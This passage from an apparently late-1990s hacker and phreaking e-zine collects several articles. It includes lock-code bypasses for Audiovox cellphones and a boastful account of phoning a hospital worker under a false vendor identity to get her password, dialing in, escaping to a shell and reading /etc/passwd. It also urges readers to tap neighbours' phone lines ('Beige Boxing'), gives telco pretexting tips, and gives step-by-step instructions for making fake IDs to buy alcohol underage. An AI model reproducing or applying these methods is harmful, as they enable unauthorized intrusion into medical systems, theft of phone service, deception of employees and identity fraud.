  1315. ------ 
  1316.  
  1317. AUDIOVOX CTX1500, 2500, 4000, 5000, BC410, 55, SP85, TRANS 410. 
  1318.  
  1319. NOTES:  These are single NAM units. 
  1320.            The ESN prefix is 138 decimal, 8A hex (Toshiba) 
  1321.            You MUST know the lock code to program this unit, see below for 
  1322.            "back door" programing methods. 
  1323.            Audiovox: 516-231-6051/213-926-7758 
  1324.  
  1325. NAM programing: 
  1326.  
  1327. 1.  With the power turned on enter N N N FUNC # 1, where NNN is the three 
  1328.     digit lock code.  The manufacturers default is 000 
  1329.  
  1330. 2.  The # key increments the step number. 
  1331.  
  1332. 3.  The * key decrements the step number. 
  1333.  
  1334. 4.  STO enters the data for each step. 
  1335.  
  1336. 5.  You MAY directly access any step by pressing RCL followed by the step 
  1337.     number. 
  1338.  
  1339. 6.  FUNC SND completes programming. 
  1340.  
  1341. 7.  FUNC CLR exits programming mode. 
  1342.  
  1343. PROGRAMING DATA: 
  1344.  
  1345. STEP#    #OF DIGITS/RANGE    DESCRIPTION 
  1346.  
  1347. 01       10 DIGITS           MIN (AREA CODE & PHONE NUMBER) 
  1348. 02       3 DIGITS            LOCK CODE 
  1349. 03       00000 - 99999       SYSTEM ID 
  1350. 04       00 - 15             ACCESS OVERLOAD CLASS 
  1351. 05       00 - 15             SYSTEM ID (10 FOR USA) 
  1352. 06       0 OR 1              LOCAL USE MARK 
  1353. 07       0 OR 1              MIN MARK 
  1354. 08       0333 OR 0334        INITIAL PAGING CHANNEL 
  1355. 09       0 OR 1              PREFERRED SYSTEM 
  1356. 10       4 DIGITS            STATION CLASS MARK 
  1357. 11       8 BINARY DIGITS     FUNCTION 1, SEE NOTE 1 BELOW 
  1358. 12       8 BINARY DIGITS     FUNCTION 2, SEE NOTE 2 BELOW 
  1359. 13       00 TO 31 HOURS      POWER OFF TIMER (CTX 4000 ONLY) 
  1360. 14       000 TO 255 SECS     NO CHARGE AIR TIMER DELAY 
  1361. 15       3 DIGITS            CALL TIMER RESET CODE 
  1362. 16 - 20  00000 - 99999       SIDH INHIBIT # 1 THRU # 5 
  1363. 21 - 25  NOT USED            FUTURE USE 
  1364.  
  1365.  
  1366. NOTES: 
  1367.  
  1368. 1.  This is an eight digit binary field. 
  1369.  
  1370.     10000000 = CALL TIMER BEEP 
  1371.     01000000 = AUTO LOCK 
  1372.     00100000 = AUTO SYSTEM REDIAL 
  1373.     00010000 = CALL RESTRICTION 
  1374.     00001000 = 32 DIGIT DIALING CAPABILITY 
  1375.     11111000 = ALL OF THE ABOVE 
  1376.  
  1377.  
  1378. 2.  As above but options are: 
  1379.  
  1380.     10000000 = HANDS FREE 
  1381.     01000000 = CONTINUOUS DTMF 
  1382.     00100000 = REPERTORY DIALING 
  1383.     00010000 = HORN ALERT 
  1384.     00001000 = ALLOWS 911 CALLING WHEN UNIT IS LOCKED 
  1385.     01101000 = ALL OF THE ABOVE 
  1386.  
  1387.  
  1388. A/B SYSTEM SELECT: 
  1389.  
  1390. FCN 0 4 DISPLAYS CURRENT MODE, 
  1391. FCN 0 0 = PREFERRED/NON-PREFERRED, 
  1392. FCN 0 1 = PREFERRED ONLY, 
  1393. FCN 0 2 = HOME ONLY 
  1394. FCN 0 3 = NON PREFERRED ONLY, 
  1395.  
  1396. "BACK DOOR" PROCEDURES: 
  1397.  
  1398. We cannot guarantee the accuracy of these procedures, USE CAUTION! 
  1399.  
  1400. SP 85 
  1401. The lock code can be reset to 000 be shorting pins 6 and 17 on the handset 
  1402. control conector. 
  1403.  
  1404. CTX SERIES 
  1405. Short pins 6 an 17 on the data cable, turn power on and enter 000 FUNC # 1. 
  1406.  
  1407. TRANS 55 AND BC 55 
  1408. Ground pin 1 of the six pin connector next to the modular jack on the 
  1409. tranceiver.  Looking at the tranciever with the modular jack to the right 
  1410. of the six pin connector, pin one is bottom right. 
  1411.  
  1412. LOCK: Press LOCK. UNLOCK: Enter three digit code. 
  1413.  
  1414. SYSTEM SELECT: F 0 4 shows current mode.  F 0 0 = Pref/Non pref, F 0 1 = Pref 
  1415. only, F 0 2 = Home Only, F 0 3 = Non pref only. 
  1416.  
  1417. ------ 
  1418.  
  1419.            Well this is all for this month, tune in next month for more 
  1420.            information. 
  1421.  
  1422. _____________________________________________________________ 
  1423. Basic Social Engineering...............WaRsPrItE 
  1424.  
  1425.  
  1426. -----BEGIN PGP SIGNED MESSAGE----- 
  1427.  
  1428.         I hesitate to even type this up and submit it for distribution. But I 
  1429. want to make the point,that hacking takes RESEARCH! The easiest way to gain 
  1430. access to somebody's account is to just ask them for their password.Here's a 
  1431. perfect example. 
  1432.         One day visiting my Mom at work I was in the IS department at my 
  1433. local hospital. I noticed a modem labeled "Dial Up" followed by the phone 
  1434. number. So just for giggles I called it and saw. 
  1435.  
  1436.                          <name of the hospital>  
  1437.                             Medical Manager 
  1438.  
  1439. SCO Unix release 2.3.4 
  1440. login: 
  1441.  
  1442. I went to the hospital the next day and found an old WYSE60 terminal with the 
  1443. same login screen sitting on one of the desks. But the terminal also had a 
  1444. sticker on it from the vendor advertising their support line. "In case of 
  1445. trouble call <company name> 1-800-555-XXXX". Making a mental note of the 
  1446. vendor's name I glanced down at the phone and made another mental note of an 
  1447. inside line phone number. The next day I called the office on the inside line 
  1448. and the conversation went something like this. 
  1449.  
  1450.  
  1451. Office girl: 
  1452.         "<name of the department> Jackie speaking.How may I help you?" 
  1453. Me:  
  1454.            "Hi Jackie! This is <fake name> calling from <company name>. How are 
  1455.            you?" 
  1456.  
  1457. Office girl: 
  1458.         "Good. What can I do for you?" 
  1459. Me: 
  1460.         "Well, we've been really busy here lately. We're upgrading the 
  1461.            cryptographic algorithm on your primary   domain controller. As well as 
  1462.            re-compiling the user accounts database. And I thought I'd call 
  1463.            office to office to make sure that everyone could get in OK. Could 
  1464.            you log out and log back in for me?" 
  1465.  
  1466. Office girl: 
  1467.         "Sure, no problem. Just a minute. Do I just enter "jjohnson" and 
  1468.            my password like always?" 
  1469.  
  1470. Me: 
  1471.         "Wait a second and I'll dial in and check. You said you enter 
  1472.            "jjohnson"? And what password?" 
  1473.  
  1474. Office girl: 
  1475.         "medical" 
  1476.  
  1477. Me:   
  1478.         "All lower case?" 
  1479.  
  1480. Office girl: 
  1481.         "yes" 
  1482.  
  1483. Me: 
  1484.         "Well,<dramatic pause> it looks good on my end. Why don't you go 
  1485.            ahead and try" 
  1486.  
  1487. Office girl: 
  1488.         "Ok....<long pause>......Ok I'm in!" 
  1489.  
  1490. Me: 
  1491.         "Great! Thanks, if you run into problems give me a call here at 
  1492.            the office" 
  1493.  
  1494.  
  1495.         The thing that struck me about her password was it was "medical" 
  1496. which was also apart of the title of the software package that they were 
  1497. using. It sounded alot like the default password that came installed when the 
  1498. vendor installed all the user accounts.So I promptly dialed in, logged in as 
  1499. "jjohnson" with a password of "medical". The bummer was that I was within a 
  1500. program and couldn't reach a shell prompt. No problem, I entered "!" (like 
  1501. hacking PINE) and bingo, a "$" appeared. After that,I did a cat of 
  1502. /etc/passwd to get a listing of all the logins. Notice I didn't do "shadow" 
  1503. all I would've got is an "access denied" and a possible entry on the admin's 
  1504. log. After that i logged off and checked all the other logins to see if they 
  1505. were also using the defaut password of "medical". Sure enough,7 were!! It is 
  1506. important to try this in case "Jackie" gets paranoid and calls the support 
  1507. line and has her password changed. Then you're back to square one. The moral 
  1508. of this story is, I managed to compromise the security of a major hospital 
  1509. just by being friendly and confusing the office help. No k-rAd 3l33t3 haX 
  1510. here, just stupid end users :) ! 
  1511.  
  1512.                                             WaRsPrItE 
  1513.  
  1514. -----BEGIN PGP SIGNATURE----- 
  1515. Version: PGP for Personal Privacy 5.0 
  1516. Charset: noconv 
  1517.  
  1518. iQEVAwUBMd/IkH5eXk/jGmY7AQGR0Af/UTrFWHAjsWIsCBXha+LSAqtJ68548Khw 
  1519. 9ye7ug1HAVU9Mu5JmbmwoKcIoavfNeLPB/35zMAnCPmpFf92US8bCSAe1MbRrmQL 
  1520. uzwqDjuo0SX/hco+HSqhd6fnajoGp9rqxEpq3QdwQ+/b9I8YTEraw30Yq+yA/Rsg 
  1521. jtOmnAKvTlb/jSsvg8wmX0xqfTJZANIOvDFXa2+sVGwuY5uh9symfMKmUXzrpNQC 
  1522. EZUtKMJnqVzpwIhZJPLAawgnFDbAu8mT8UZ/BQVJ/GeyaVwiDe8VzkuiACDY418f 
  1523. kRFWDNSObbadWVuLoGxo9Ag6hfhquuptrRx8SJm19OgeUzam1dXX0Q== 
  1524. =f/5Y 
  1525. -----END PGP SIGNATURE----- 
  1526.  
  1527. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- 
  1528.  
  1529. DTMF Decoding - By ArcAngl 
  1530.  
  1531. Ok,  I have had the shits of having newbies beg for info on HOW TO DECODE DTMFs!! 
  1532. So here it is.... 2 ways of many! 
  1533.   
  1534. software: 
  1535. WWW.Cyberramp.net/~shima/index.html 
  1536.            It will only decode 4 digits at a time with the shareware version, but if 
  1537. you're clever, you record the wav file then edit it into pieces to decode 
  1538. whole #'s.  
  1539.  
  1540. ...or 
  1541. If you're clever, you will record the number, then dial your own pager #  
  1542. and play it back into the phone, and press the pound sign when done.  The  
  1543. pager will show the # in a minute. ;- 
  1544.  
  1545. _____________________________________________________________ 
  1546.  
  1547.                                                   -------------    
  1548.                                          --=[Redneck Phreaking]=-- 
  1549.                                                    By Shoelace 
  1550.                                                   ------------- 
  1551.  
  1552.         Hola!  Shoelace here, writing a small, lame entry to inform people 
  1553. near me, and in other places down South, about how easy it really is to 
  1554. get even the simplest phreaking in.  Contrary to popular belief, there are  
  1555. phreaks in Tennessee.  In my town, we have only 5 that I know of.  The most 
  1556. noted of course, is dr1x/kz.  I think only three of us have modified our 
  1557. Tone Dialers to make them into Red Boxes, with the help of Acid_novA.  But,  
  1558. the most simplest of all phreaking here, or at least in East Tennessee, is 
  1559. Beige Boxing.  You don't even need aligator clips, or really anything else 
  1560. in the help files about Beige Boxing that you have probably read.  All you  
  1561. need is a screwdriver, and a regular phone.  You see, behind all the houses 
  1562. are these grayish colored boxes of varies sizes.  They usually say  
  1563. "Telephone Network Interface" on them.  They are attached by screws.  Unscrew 
  1564. it, and open it up.  You will see one, maybe two (if they have two lines),  
  1565. holes with phone jacks in them.  Take out that jack, and put in your phone. 
  1566. You should have dialtone.  Ta da!  That is how easy it is to Beige Box down 
  1567. South.  I don't know what other states have their boxes like this, but if you 
  1568. do, don't delay!  Go out and Beige Box!   
  1569.          
  1570.                 -Shoelace 
  1571. -http://www.public.usit.net/sltaylor 
  1572.  
  1573.                                                     -------    
  1574.                                  --=[The End]=-- 
  1575.                                                     -------    
  1576.  
  1577. _____________________________________________________________ 
  1578. Basic UNIX Scripting...................WaRsPrItE 
  1579.  
  1580. -----BEGIN PGP SIGNED MESSAGE----- 
  1581.  
  1582.         Here's some basic UNIX scripts that I found useful for searching a 
  1583.            system for log files, grep'ing for possible entries, and traversing 
  1584.            directory trees.These were written for SCO UNIX. 
  1585.  
  1586. # .kshrc        -- Commands executed by each Korn shell at startup 
  1587. # Copyright (c) 1990, The WaRsPrItE Corporation Inc. =] 
  1588. # All rights reserved. 
  1589. # If there is no VISUAL or EDITOR to deduce the desired edit 
  1590. #  mode from, assume vi(C)-style command line editting. 
  1591. if [ -z "$VISUAL" -a -z "$EDITOR" ]; then 
  1592.            set -o vi 
  1593. fi 
  1594. TMOUT=300 
  1595. info() 
  1596.    echo "\nDate          `date '+%m/%d/%y %H:%M'`\n" 
  1597.    echo "logname       `logname`" 
  1598.    echo "Parent PID    $PPID" 
  1599.    echo "Old pwd       $OLDPWD" 
  1600.    echo "On            `expr $SECONDS / 60` minutes" 
  1601.    echo "Path          $PATH" 
  1602.    echo "cd path       $CDPATH" 
  1603.    echo "Home          $HOME" 
  1604.    echo "Time out      $TMOUT" 
  1605.    echo "Current Jobs  `jobs`" 
  1606.    echo "Spooler       `lpstat`" 
  1607. #----------------------------------------------------------------- 
  1608. # Change Directory 
  1609. # Changes directory and sets the new PS1 variable 
  1610. #----------------------------------------------------------------- 
  1611. ccd() 
  1612.    if [ $1 ] 
  1613.    then 
  1614.          cd $1 
  1615.          PS1="!_`logname`_`pwd`> " 
  1616.    fi 
  1617.  
  1618. #----------------------------------------------------------------- 
  1619. # List DIRectories 
  1620. #----------------------------------------------------------------- 
  1621. ldir() 
  1622.    l -F $1 | grep / | more 
  1623.  
  1624. #----------------------------------------------------------------- 
  1625. # File Find 
  1626. # Recursively looks for a file from the working directory 
  1627. #----------------------------------------------------------------- 
  1628. ffind() 
  1629.    if [ $# = 1 ] 
  1630.    then 
  1631.          find . -name $1 -print 
  1632.    else 
  1633.          echo "Usage: ffind <filename>" 
  1634.    fi 
  1635.  
  1636. #----------------------------------------------------------------- 
  1637. # Recursive Grep 
  1638. # Search's all files below working for search string 
  1639. #----------------------------------------------------------------- 
  1640. rgrep() 
  1641.    if [ $# = 1 ] 
  1642.    then 
  1643.          echo "Searching: $1" 
  1644.          find . -local -exec grep -il $1 {} \; 
  1645.    else 
  1646.          echo "rgrep: Invalid number of arguments" 
  1647.    fi 
  1648.  
  1649. #----------------------------------------------------------------- 
  1650. # Recursive Chmod 
  1651. #----------------------------------------------------------------- 
  1652. rchmod() 
  1653.    if [ $# = 1 ] 
  1654.    then 
  1655.          find . -local -exec chmod $1 {} \; 
  1656.    else 
  1657.          echo "Usage: rchmod <mode>" 
  1658.    fi 
  1659.  
  1660. #----------------------------------------------------------------- 
  1661. # Recursive Chown 
  1662. #----------------------------------------------------------------- 
  1663. rchown() 
  1664.    if [ $# = 1 ] 
  1665.    then 
  1666.          find . -local -exec chown $1 {} \; 
  1667.    else 
  1668.          echo "Usage: rchown <owner>" 
  1669.    fi 
  1670.  
  1671. #----------------------------------------------------------------- 
  1672. # Recursive Chgrp 
  1673. #----------------------------------------------------------------- 
  1674. rchgrp() 
  1675.    if [ $# = 1 ] 
  1676.    then 
  1677.          find . -local -exec chgrp $1 {} \; 
  1678.    else 
  1679.          echo "Usage: rchgrp <group>" 
  1680.    fi 
  1681.  
  1682. alias cd="ccd" 
  1683. alias home="cd $HOME ; clear ; m" 
  1684. alias .l="history" 
  1685. alias .x="fc -e -" 
  1686. alias .e="fc -e vi " 
  1687.  
  1688. #----------------------------------------------------------------- 
  1689. # Total the size of the file in current directory 
  1690. #----------------------------------------------------------------- 
  1691. total() 
  1692.    clear 
  1693.    l $1 | awk ' 
  1694.                     { if ( $1 != "total" ) { 
  1695.                             counter = counter + $5 
  1696.                             printf("%10s %s %s\n",counter, $0, system("file ",$1) }} ' | more 
  1697.  
  1698. #----------------------------------------------------------------- 
  1699. # Easy Change Directory 
  1700. # I found this in a sys admin forum and modified it.  Changed the 
  1701. # home of the ecd files to /tmp to save room on the system.  If  
  1702. # you want everyone to have their own list just change the /tmp's 
  1703. # to $HOME.  Sorry the modules are not very well documented, it was 
  1704. # late and I concentrated more on the code. 
  1705. #  
  1706. # Scott 
  1707. #----------------------------------------------------------------- 
  1708.  
  1709. ecd() 
  1710.    if [ $FCD ] 
  1711.    then 
  1712.          echo "sorry.." 
  1713.          return 
  1714.    else 
  1715.          FCD="Fcd" 
  1716.          export FCD 
  1717.    fi 
  1718.    echo 
  1719.    echo "Loading ecd: type \"ecd\" for information" 
  1720. #----------------------------------------------------------------- 
  1721. # add a directory to the list 
  1722. #----------------------------------------------------------------- 
  1723.    addline() 
  1724.    { 
  1725.          error=0 
  1726.          echo "Enter full path of $Newline: \c" 
  1727.          read Fullpath 
  1728.          if [ -d $Fullpath ] 
  1729.          then 
  1730.             echo $Fullpath >> /tmp/ecd.list 
  1731.          else 
  1732.             echo "Sorry, can't find that directory!" 
  1733.             error=1 
  1734.          fi 
  1735.    } 
  1736. #----------------------------------------------------------------- 
  1737. # usage 
  1738. #----------------------------------------------------------------- 
  1739.    function usage 
  1740.    { 
  1741.          echo "\n" 
  1742.          echo "Easy Change Directory:" 
  1743.          echo 
  1744.          echo "Usage: ecd directory-name" 
  1745.          echo "       ecd -e directory for extended search." 
  1746.          echo "       ecd -p to add current direcory to list." 
  1747.          echo "       ecd -r to recursively scan directories under current." 
  1748.          echo "\n" 
  1749.    } 
  1750. #----------------------------------------------------------------- 
  1751. # main Loop 
  1752. #----------------------------------------------------------------- 
  1753.    function ecd 
  1754.    { 
  1755.          error=0 
  1756.          FileDir=/tmp/ecd.list 
  1757.          Duplist=/tmp/ecd.dup 
  1758.          if [ $# = 0 ] 
  1759.          then 
  1760.             usage 
  1761.             return 0 
  1762.          fi 
  1763.          Extend="NO" 
  1764. #----------------------------------------------------------------- 
  1765. # Check for right parameters 
  1766. #----------------------------------------------------------------- 
  1767.          case $1 in 
  1768.          "-e") 
  1769.             if [ $# != 2 ] 
  1770.             then 
  1771.                   echo "Error: insufficient parameters ($#)" 
  1772.                   echo "Usage: ecd -e directory" 
  1773.             fi 
  1774.             Extend="YES" 
  1775.             shift 
  1776.             ;; 
  1777.          "/") 
  1778.             ccd / 
  1779.             return 0 
  1780.             ;; 
  1781.          "-p") 
  1782.             CurDir=$(pwd) 
  1783.             grep "$CurDir\$" $FileDir > /dev/nul 
  1784.             if [ $? != 0 ] 
  1785.             then 
  1786.                   echo $CurDir >> $FileDir 
  1787.                   return 0 
  1788.             else 
  1789.                   echo "Current directory $CurDir\n is already in $FileDir" 
  1790.                   return 1 
  1791.             fi 
  1792.             ;; 
  1793.          "-r") 
  1794.             echo "Scanning direcotories under $PWD" 
  1795.             find $PWD -type d -print >> $FileDir 
  1796.             cat "$FileDir" | sort | uniq > $Duplist 
  1797.             if [ $? = 0 ] 
  1798.             then 
  1799.                   echo "Sorted and cleaned up $FileDir" 
  1800.                   echo 
  1801.                   mv $Duplist $FileDir 
  1802.             fi 
  1803.             return 0 
  1804.             ;; 
  1805.          esac 
  1806. #----------------------------------------------------------------- 
  1807. # Does a list exist? if not make one 
  1808. #----------------------------------------------------------------- 
  1809.          if [ ! -f $FileDir ] 
  1810.          then 
  1811.             echo "Creating new $FileDir in /tmp.  It may take a while..." 
  1812.             find /tmp -type d -print > $FileDir 
  1813.          fi 
  1814. #----------------------------------------------------------------- 
  1815. # Check the list 
  1816. #----------------------------------------------------------------- 
  1817.          if [ $Extend = "YES" ] 
  1818.          then 
  1819.             grep $1 $FileDir > $Duplist 
  1820.          else 
  1821.             grep $1'$' $FileDir > $Duplist 
  1822.          fi 
  1823. #----------------------------------------------------------------- 
  1824. # Number the lines 
  1825. #----------------------------------------------------------------- 
  1826.          lines=`wc -l $Duplist | awk '{print $1}'` 
  1827. #----------------------------------------------------------------- 
  1828. # Does the directory exist? 
  1829. #----------------------------------------------------------------- 
  1830.          case $lines in 
  1831.          0) 
  1832.             echo "Not found: add(y/n)?\c" 
  1833.             read ans 
  1834.             if [ $ans = 'y' ] 
  1835.             then 
  1836.                   Newline=$1 
  1837.                   addline $Newline 
  1838.                   if [ $error = 1 ] 
  1839.                   then 
  1840.                         return 1 
  1841.                   fi 
  1842.             else 
  1843.                   return 1 
  1844.             fi 
  1845.             ;; 
  1846.          1) 
  1847.             Flist=`cat $Duplist` 
  1848.             ;; 
  1849.          *) 
  1850.             echo 
  1851.             awk '{ printf "%2d : %s\n", NR, $0 }' $Duplist 
  1852.             echo "-----------------------------------------------------------------------" 
  1853.             echo -n "(Enter directory number or 'q' for none)? \c" 
  1854.             read lineno 
  1855.             if [ $lineno = 'q' ] 
  1856.             then 
  1857.                   echo "Removing possible duplications from file list..." 
  1858.                   cat "$FileDir" | sort | uniq > $Duplist 
  1859.                   if [ $? = 0 ] 
  1860.                   then 
  1861.                         echo "Sorted and cleaned $FileDir" 
  1862.                         mv $Duplist $FileDir 
  1863.                   fi 
  1864.                   return 1 
  1865.             fi 
  1866.             while [ $lineno -gt $lines -o $lineno -lt 1 -o $lineno = 'q' ] 
  1867.             do 
  1868.                   echo -n "Valid input: 1-$lines or q.  Re-enter number: \c" 
  1869.                   read lineno 
  1870.             done 
  1871.             if [ $lineno = 'q' ] 
  1872.             then 
  1873.                   return 1 
  1874.             fi 
  1875.             Flist=`sed -n "${lineno}p" $Duplist` 
  1876.             ;; 
  1877.          esac 
  1878.          echo "Changing directory to: $Flist" 
  1879.          echo "\n" 
  1880.          ccd $Flist 2> /dev/null 
  1881.          if [ $? != 0 ] 
  1882.          then 
  1883.             echo "Removing defunct $Flist from $FileDir" 
  1884.             cat $FileDir |  grep -v $Flist > $Duplist 
  1885.             if [ $? = 0 ] 
  1886.             then 
  1887.                   mv $Duplist $FileDir 
  1888.             else 
  1889.                   echo "An error occured while editing $FileDir.  It may be damaged" 
  1890.             fi 
  1891.          fi 
  1892.    } 
  1893.    ecd $1 
  1894.  
  1895.                                             WaRsPrItE 
  1896.  
  1897. -----BEGIN PGP SIGNATURE----- 
  1898. Version: PGP for Personal Privacy 5.0 
  1899. Charset: noconv 
  1900.  
  1901. iQEVAwUBMd/KnH5eXk/jGmY7AQFWAwf+IXUFbYOnZWXrg0DfJj49Yv/tJ3V1Jfz8 
  1902. fQ2BUUJhUxSEEe2RjQbr0D8gnQkG/EGOLAP4MvkKQVqyRHhFF+AsO3QEtIH1WGDI 
  1903. x6Z/aAQv0ALWE/qUQR0lgPToVClECz/mdEKi4Z92UUYPmrrYO8Uv3DKhmDwWvNTE 
  1904. hSXKWNsrBhS/eJhQqF3ptk7EoWL2C4fgLchTjy7faHY+w7WGocHQf3SvPJCDdi7n 
  1905. tQoLzxsBL0skBhuzGIeQvInBPHrRRIT1hAq0Q4Si5tp7PxAds7YFXWPzCel1HccE 
  1906. VpOUJaQ/H8QlUxDqzoF/jeWIuqES9qxNauCET+VUA4uX3J3RlC0ycg== 
  1907. =vVWe 
  1908. -----END PGP SIGNATURE----- 
  1909.  
  1910.  
  1911. _____________________________________________________________ 
  1912. KEEPING UP WITH THE TELCOS--- by ArcAngl 
  1913.  
  1914. Employee News & Information Lines: 
  1915. --------------------------------- 
  1916. The phone company has a phone number that their employees can call up and find out what's new with  
  1917. the company, how the company's stock is doing, what new advances in phones have been discovered and  
  1918. how they're catching people like us. To get a newsline number, call the phone company's main office and  
  1919. ask  
  1920. them for it. Sometimes they won't know what you're talking about but keep 
  1921. pestering them until they give it to you. Below is a small list of newslines. 
  1922.  
  1923.            Bell Atlantic....................(800)-647-NEWS 
  1924.            Ameritech.......................(800)-893-LINE 
  1925.                                                                  (312)-917-9797 
  1926.  
  1927. Main Numbers & Employee Locators: 
  1928. -------------------------------- 
  1929. An employee locator is a service for Bell employees that helps you find out 
  1930. exactly what department any employee of Bell works for. Sometimes automated, 
  1931. you enter in the name of the employee on your touch tone phone and the  
  1932. computer will rattle off their work phone number, street address and state. 
  1933. Most locators have a live operator who you just ask for the information. 
  1934.  
  1935. Usually the employee locator is the same number as the main number. To get  
  1936. this number, call up directory asisstance and ask them for the phone company's 
  1937. main number. Call the main number and if they're not the employee locator, ask 
  1938. them for that number. In most cases, it's given to you, no questions asked. 
  1939.  
  1940. If you can't get the phone company's main number from directory asisstance,  
  1941. try calling the billing office and ask them. Below is a short list of numbers. 
  1942.  
  1943.            Bell Atlantic (West Virginia)..........(304)-954-6202 
  1944.            Bell Atlantic (Virginia)...............(804)-225-6300 
  1945.            Cincinnati Bell (Ohio).................(513)-397-5775 
  1946.            South Central Bell (Jackson, Miss.)....(601)-961-1327 
  1947.            Southwestern Bell (Little Rock, Ark.)..(501)-373-9800 
  1948.            U.S. West (Western U.S.)...............(800)-879-4357 
  1949.            Ameritech (Indianapolis, IN)...........(317)-265-2266 
  1950.            Southern Bell (South Carolina).........(800)-336-0014 
  1951.            Pacific Bell (Los Angeles, CA).........(213)-339-6622 
  1952.  
  1953.  
  1954. _____________________________________________________________ 
  1955. The Weather Report:  Federal Hotline Numbers 
  1956. By: WeatherM 
  1957.  
  1958.  
  1959. ------------------------------------------------------- 
  1960. Department of Agriculture                1 800 424 9121 
  1961. Department of Defense                    1 800 424-9098 
  1962. Environmental Protection Agency          1 800 424-9346 
  1963. Department of Health and Human Services  1 800 368-5779 
  1964. Department of Housing                    1 800 669-9777 
  1965. Railroad Retirement Board                1 800 772 4258 
  1966. Small Business Administration            1 800 827 5722 
  1967. Social Security Administration           1 800 772 1213 
  1968. Department of Veterans Affairs           1 800 827 2039 
  1969. Federal Emergency Management Agency      1 800 638 6620 
  1970. Federal Job Information                  1 202 606 2700 
  1971. ------------------------------------------------------- 
  1972. Have fun you little boogers. 
  1973. Contact Info 
  1974. weatherm@beer.com   
  1975. weatherm@thepentagon.com 
  1976. www.surfsouth.com/~weatherm/ 
  1977. _____________________________________________________________ 
  1978. Fake IDs by N-TREEG 
  1979.  
  1980. This article is for all of you out there that's ever wanted to make yourself 
  1981. a fake ID. THTJ brings you a quick and easy method.  Note, these type of ID's 
  1982. won't get you into a club, nor will they get you alcohol from a major liquor 
  1983. store that scrutinizes ID's closely.  These will get you alcohol at a grocery 
  1984. store if a teenage cashier asks you for some id while you're buying that 
  1985. bottle of wine cooler (or rum I luv rum!).  Shall we begin?  All righty... 
  1986.  
  1987. MATERIALS 
  1988. Okay you're gonna need a few things.  Here's what you'll need: 
  1989.  
  1990.  1)  A computer and a printer, preferably inkjet or laser. 
  1991.   
  1992.  2)  Transparencies that are suited to work with your type of printer.  Some 
  1993.         regular white (or colored/patterned) printer paper would be nice too. 
  1994.  
  1995.  3)  An index card. 
  1996.  
  1997.  4)  A small laminating machine.  You can pick these up from Office Depot for 
  1998.         about $49.  Split the cost with some friends.  Or if you're gonna be 
  1999.         selling ID's it'll eventually pay for itself. 
  2000.  
  2001.  5)  Laminating pouches to use in the laminating machine.  These don't usually 
  2002.         come with the laminating machine.  Don't forget to pick some up.  Also 
  2003.         found at Office Depot. 
  2004.  
  2005.  6)  Colorful paper currency from a foreign country.  Go to your local bank and 
  2006.         ask to purchase some paper bills from maybe a Caribbean island or 
  2007.         something.  They usually have nicely colored paper money.  Something with 
  2008.         green, yellow, orange, tan, or red works well.  Make sure the money has 
  2009.         some sort of government seal on it. 
  2010.  
  2011.  7)  A good picture of  yourself.  When you take the picture, make sure you are 
  2012.         in front of a solid colored background.  It wouldn't fool anyone if you use 
  2013.         a picture of yourself taken in front of a brick wall.  Try to take the 
  2014.         picture in front of a solid colored wall or curtain. 
  2015.  
  2016.  MAKING THE ID 
  2017.  
  2018. Okay now that you've gathered your necessities, it's time to go to work. First 
  2019. you want to make your info sheet with your computer.  In a word processor, 
  2020. make a box about the size of a drivers license with the info you want to 
  2021. appear on your id.  Include a name, address, identification number, birthdate, 
  2022. etc. etc.  Make sure you leave space to the left for a picture to go.  Now 
  2023. print up the sheet on a transparency and cut it out. 
  2024.  
  2025. Lay your transparency over the paper money.  Get the idea now?  The paper 
  2026. money makes a great background.  Slip your picture in between the transparency 
  2027. and the paper money background in the spot you left empty for the photo. 
  2028. Doesn't that look great?  Well almost.  The side with the picture on it is 
  2029. thicker isn't it?  That's what you use the index card for.  Cut an index card 
  2030. in the shape of the id minus the amount of space the photo takes up.  Now 
  2031. place the index card behind the paper money and the whole thing should be 
  2032. about equal depth. 
  2033.  
  2034. Now go back to your computer and print out some stuff for the back of your id. 
  2035. Make a little box with the caption "thumb print" if you like, then you can 
  2036. stick your thumb in an ink pad and put your thumb print in the box to make the 
  2037. id look more authentic.  Also put up some stuff about blood type.  Make a 
  2038. rectangular box at the bottom for a signature.  At the top put up a heading 
  2039. with something similar to "PROPERTY OF THE ISLAND OF BARBADOS  U.S.  Embassy" 
  2040. or some b.s. like that.  Do whatever comes to mind with it.  Print it out on 
  2041. your regular white computer paper (or you can go for that patterned paper they 
  2042. sell at office depot).  Cut it to size and attach it to the back of the id 
  2043. with the index card sandwiched between the white paper and the paper money. 
  2044. Once you're satisfied with the way your id is laid out, follow your 
  2045. laminiator's instructions to seal your id in plastic.  Make sure the edges 
  2046. are smooth and rounded and try not to let any air-bubbles gather in your 
  2047. laminated id. 
  2048.  
  2049. You've now got yourself a pretty cheesy id.  But hey, sometimes they work. 
  2050. A good friend of mine uses his all the time at a gas station to buy beer. 
  2051. They are also helpful if you go on cruises to places like say.....Cancun! 
  2052. where they _really_  don't care how old you are, but you still gotta have 
  2053. some kind of ID. 
  2054.  
  2055. Here's a few suggestions and add-ons for your id.  When making your 
  2056. transparency, make a copy of the government seal off of the paper currency. 
  2057. Incorporate that into your transparency to make it look more authentic.  I 
  2058. personally don't know where to get holograms made or how to incorporate them. 
  2059. For something similar, try to get some of that "rainbow" like paper they use 
  2060. in gift baskets...the kind that change colors and shimmers when you reflect 
  2061. light off of it.  Put some of that behind the seal to make an illusion of a 
  2062. hologram.  You can also try reflective tape (by 3M), I don't know how well 
  2063. that will work.  It's up to you to experiment.  Have fun, and play nicely! 
  2064.  
  2065.  
  2066. Special thanks to SirRob for introducing me to the concept. 
  2067.  
  2068. And remember, HaX0r3d PerceptionS  leases .... THTJ ownz! 
  2069.  
  2070. N-TREEG 
  2071. HaX0r3d PerceptionS 
  2072. http://www.afn.org/~afn56746 
  2073.  
  2074. Shouts to the UF crew; HBS and THTJ; #'s phreak, 2k, & area66 on the 
  2075. undernet; PADmaster & speed1 
  2076.  
  2077. _____________________________________________________________ 
  2078. Oddville, THTJ - from the demented e-mail send to Scud-O 
  2079.  
  2080.            Once again, it is time for some of the oddest, craziest, and 
  2081. stupidest e-mail that gets sent to me every month.. so on with the show! 
  2082.  
  2083.            Again, if i reply to an e-mail, the reply is inside the brackets. 
  2084. --- 
  2085.  
  2086. To: scud@thtj.com 
  2087. Subject: i am a leet hax0r 
  2088.  
  2089. 3y3 w45 w0n3r1ng 1f y0u w3r3 3v3r g01ng t0 d0 4ny w4r3z 4rt1cl3s. mY  
